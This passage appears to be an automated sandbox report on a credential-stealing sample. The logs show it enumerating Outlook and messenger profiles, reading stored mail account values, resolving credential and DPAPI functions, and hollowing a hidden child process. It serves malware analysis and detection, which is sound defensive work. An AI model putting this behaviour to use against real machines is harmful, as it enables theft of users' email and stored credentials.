Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Group Mail - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MessengerService - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Yahoo\Pager - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail - False 1
Fn
Read Value HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - False 1
Fn
Module (32)
»
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x75020000 True 1
Fn
Load shell32.dll base_address = 0x76480000 True 1
Fn
Load pstorec.dll base_address = 0x6fe60000 True 1
Fn
Load crypt32.dll base_address = 0x76260000 True 2
Fn
Load advapi32.dll base_address = 0x77740000 True 3
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x766cfb26 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x76295a7f True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredReadA, address_out = 0x777871c1 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredFree, address_out = 0x7774b2ec True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredDeleteA, address_out = 0x77787941 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateA, address_out = 0x77787381 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateW, address_out = 0x77787481 True 3
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 1
Fn
Get Info type = Operating System True 1
Fn
Ini (7)
»
Operation Filename Additional Information Success Count Logfile
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Process #9: oyvgkgw.exe
1285 0
»
Information Value
ID #9
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x64
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 89C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00120000 0x0015bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00141fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x0022ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x003b7fff Pagefile Backed Memory Readable True False False -
oyvgkgw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0cb7ffff Private Memory Readable, Writable True False False -
~dfa84a14a0862f3f78.tmp 0x0cac0000 0x0cb3ffff Memory Mapped File Readable, Writable True True False
private_0x000000000cb70000 0x0cb70000 0x0cb7ffff Private Memory Readable, Writable True False False -
private_0x000000000cbd0000 0x0cbd0000 0x0cccffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccd0000 0x0ccd0000 0x0ce50fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce60000 0x0ce60000 0x0e25ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e260000 0x0e260000 0x0e65ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e660000 0x0e92efff Memory Mapped File Readable False False False -
private_0x000000000e930000 0x0e930000 0x0ea6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ea0efff Pagefile Backed Memory Readable True False False -
private_0x000000000ea30000 0x0ea30000 0x0ea6ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eb60000 0x0eb60000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0edaffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ec9ffff Private Memory Readable, Writable True False False -
private_0x000000000ecd0000 0x0ecd0000 0x0ecdffff Private Memory Readable, Writable True False False -
private_0x000000000ed10000 0x0ed10000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000ed70000 0x0ed70000 0x0edaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000edb0000 0x0edb0000 0x0f1affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f1b0000 0x0f1b0000 0x0f5a2fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f5b0000 0x0fedffff Memory Mapped File Readable False False False -
private_0x000000000fee0000 0x0fee0000 0x100dffff Private Memory Readable, Writable True False False -
private_0x00000000100e0000 0x100e0000 0x104dffff Private Memory Readable, Writable True False False -
private_0x00000000104e0000 0x104e0000 0x10cdffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_INPUT_HANDLE type = file_type False 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type False 1
Fn
Get Info STD_ERROR_HANDLE type = file_type False 1
Fn
Get Info C:\Windows\system32\.HLP type = file_attributes False 2
Fn
Get Info C:\Windows\Help\.HLP type = file_attributes False 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors - False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 value_name = AllowUnsafeObjectPassing, data = 68, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\ProgramData\oyvGkGw.exe os_pid = 0x62c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread (3)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\programdata\oyvgkgw.exe os_tid = 0x89c True 1
Fn
Set Context c:\programdata\oyvgkgw.exe os_tid = 0x89c True 1
Fn
Resume c:\programdata\oyvgkgw.exe os_tid = 0x89c True 1
Fn
Memory (5)
»
Operation Process Additional Information Success Count Logfile
Allocate C:\ProgramData\oyvGkGw.exe address = 0x150004, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 277989832 True 1
Fn
Write C:\ProgramData\oyvGkGw.exe address = 0x400000, size = 512 True 1
Fn
Data
Write C:\ProgramData\oyvGkGw.exe address = 0x43c000, size = 512 True 1
Fn
Data
Write C:\ProgramData\oyvGkGw.exe address = 0x401000, size = 239104 True 1
Fn
Data
Write C:\ProgramData\oyvGkGw.exe address = 0x7efde008, size = 4 True 1
Fn
Data
Module (101)
»
Operation Module Additional Information Success Count Logfile
Load OLEAUT32.DLL base_address = 0x75a00000 True 1
Fn
Load SXS.DLL base_address = 0x752d0000 True 1
Fn
Load ntdll base_address = 0x77be0000 True 6
Fn
Load kernel32 base_address = 0x75fb0000 True 3
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Handle c:\programdata\oyvgkgw.exe base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75a00000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75be0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x771c0000 True 1
Fn
Get Filename - process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 3
Fn
Get Filename - process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 3
Fn
Get Filename c:\programdata\oyvgkgw.exe process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsTNT, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
